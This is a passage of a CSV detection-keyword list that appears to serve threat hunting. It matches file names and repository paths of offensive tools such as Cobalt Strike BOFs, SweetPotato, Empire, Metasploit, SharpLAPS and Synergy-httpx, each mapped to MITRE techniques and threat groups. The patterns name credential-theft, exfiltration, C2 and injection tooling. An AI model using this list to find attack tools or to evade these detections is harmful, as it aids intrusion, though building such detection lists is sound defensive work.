HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*SweetPotato.cna*",".{0,1000}SweetPotato\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","10","10","238","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z" "*SweetPotato.csproj*",".{0,1000}SweetPotato\.csproj.{0,1000}","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","10","10","238","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z" "*SweetPotato.exe*",".{0,1000}SweetPotato\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","10","10","238","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z" "*SweetPotato.exe*",".{0,1000}SweetPotato\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SweetPotato.exe*",".{0,1000}SweetPotato\.exe.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*SweetPotato.ImpersonationToken*",".{0,1000}SweetPotato\.ImpersonationToken.{0,1000}","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","10","10","238","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z" "*SweetPotato.sln*",".{0,1000}SweetPotato\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","10","10","238","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z" "*SweetPotato-N*.exe*",".{0,1000}SweetPotato\-N.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","89","42","2024-04-21T05:49:15Z","2021-01-20T13:08:24Z" "*sweetsoftware/Ares*",".{0,1000}sweetsoftware\/Ares.{0,1000}","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","1","N/A","10","10","1502","474","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" "*swisskyrepo/SharpLAPS*",".{0,1000}swisskyrepo\/SharpLAPS.{0,1000}","offensive_tool_keyword","SharpLAPS","Retrieve LAPS password from LDAP","T1552.005 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/swisskyrepo/SharpLAPS","1","1","N/A","10","4","363","71","2021-02-17T14:32:16Z","2021-02-16T17:27:41Z" "*swisskyrepo/SSRFmap*",".{0,1000}swisskyrepo\/SSRFmap.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*SwitchPriv.exe*",".{0,1000}SwitchPriv\.exe.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*SxNade/Rudrastra*",".{0,1000}SxNade\/Rudrastra.{0,1000}","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","1","N/A","8","1","61","20","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z" "*syhunt.com/sandcat/*",".{0,1000}syhunt\.com\/sandcat\/.{0,1000}","offensive_tool_keyword","sandcat","An open-source pentest oriented web browser","T1216 - T1590 - T1071","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/syhunt/sandcat","1","1","N/A","6","6","511","77","2023-12-21T18:40:27Z","2014-05-20T23:36:21Z" "*syhunt/sandcat*",".{0,1000}syhunt\/sandcat.{0,1000}","offensive_tool_keyword","sandcat","An open-source pentest oriented web browser","T1216 - T1590 - T1071","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/syhunt/sandcat","1","1","N/A","6","6","511","77","2023-12-21T18:40:27Z","2014-05-20T23:36:21Z" "*syhunt-sandcat-*.exe*",".{0,1000}syhunt\-sandcat\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","sandcat","An open-source pentest oriented web browser","T1216 - T1590 - T1071","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/syhunt/sandcat","1","1","N/A","6","6","511","77","2023-12-21T18:40:27Z","2014-05-20T23:36:21Z" "*synacktiv/DLHell*",".{0,1000}synacktiv\/DLHell.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004?","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","1","N/A","9","1","92","12","2024-04-17T14:03:13Z","2024-04-17T13:00:12Z" "*synacktiv/GPOddity*",".{0,1000}synacktiv\/GPOddity.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","1","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*synacktiv/ntdissector*",".{0,1000}synacktiv\/ntdissector.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","1","N/A","9","2","100","10","2024-01-30T14:28:59Z","2023-09-05T12:13:47Z" "*synacktiv/OUned*",".{0,1000}synacktiv\/OUned.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","1","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*synacktiv_gpoddity*",".{0,1000}synacktiv_gpoddity.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*sync-starkiller*",".{0,1000}sync\-starkiller.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*synergy_httpx.py*",".{0,1000}synergy_httpx\.py.{0,1000}","offensive_tool_keyword","Synergy-httpx","A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically","T1021.002 - T1105 - T1090","TA0002 - TA0011 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/t3l3machus/Synergy-httpx","1","1","N/A","8","2","117","18","2023-09-09T10:38:38Z","2023-06-02T10:06:41Z" "*Synergy-httpx-main*",".{0,1000}Synergy\-httpx\-main.{0,1000}","offensive_tool_keyword","Synergy-httpx","A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically","T1021.002 - T1105 - T1090","TA0002 - TA0011 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/t3l3machus/Synergy-httpx","1","1","N/A","8","2","117","18","2023-09-09T10:38:38Z","2023-06-02T10:06:41Z" "*syscall_disable_priv *",".{0,1000}syscall_disable_priv\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Syscall BOF to arbitrarily add/detract process token privilege rights.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Toggle_Token_Privileges_BOF","1","0","N/A","10","10","51","19","2021-09-14T18:50:42Z","2021-09-14T17:47:08Z" "*syscall_enable_priv *",".{0,1000}syscall_enable_priv\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Syscall BOF to arbitrarily add/detract process token privilege rights.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Toggle_Token_Privileges_BOF","1","0","N/A","10","10","51","19","2021-09-14T18:50:42Z","2021-09-14T17:47:08Z" "*syscall_inject.rb*",".{0,1000}syscall_inject\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*syscalls.asm*",".{0,1000}syscalls\.asm.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","10","10","295","41","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z" "*syscalls.nim*",".{0,1000}syscalls\.nim.{0,1000}","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/icyguider/Nimcrypt2","1","1","N/A","N/A","8","707","118","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z" "*syscalls_dump.*",".{0,1000}syscalls_dump\..{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*syscalls_inject *",".{0,1000}syscalls_inject\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","0","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*syscalls_inject.*",".{0,1000}syscalls_inject\..{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*syscalls_shinject *",".{0,1000}syscalls_shinject\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","0","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*syscalls_shspawn *",".{0,1000}syscalls_shspawn\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","0","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*syscalls_spawn 